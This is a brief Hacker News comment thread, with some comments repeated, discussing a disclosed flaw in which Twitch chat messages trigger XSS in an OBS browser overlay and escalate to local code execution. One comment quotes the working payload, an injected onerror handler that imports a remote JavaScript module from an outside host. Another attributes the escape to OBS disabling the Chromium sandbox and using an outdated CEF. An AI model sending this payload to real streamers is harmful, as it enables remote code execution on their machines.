dang40m agoHN ↗Url changed from https://cyberinsider.com/malicious-twitch-chat-messages-can-..., which points to this.
verteu33m agoHN ↗tldr: XSS on OBS via the message !image http://toto.jpg/x'onerror=import('https://ha10.scrt.ch:8080/poc-module.js');a='a
Macha7m agoHN ↗The interesting part IMO is less the XSS on the streamer's overlay, but the fact that it could escape the browser source web page into local code execution (via a combination of OBS disabling the chromium sandbox, and using an outdated CEF version)
Url changed from https://cyberinsider.com/malicious-twitch-chat-messages-can-..., which points to this.
tldr: XSS on OBS via the message
The interesting part IMO is less the XSS on the streamer's overlay, but the fact that it could escape the browser source web page into local code execution (via a combination of OBS disabling the chromium sandbox, and using an outdated CEF version)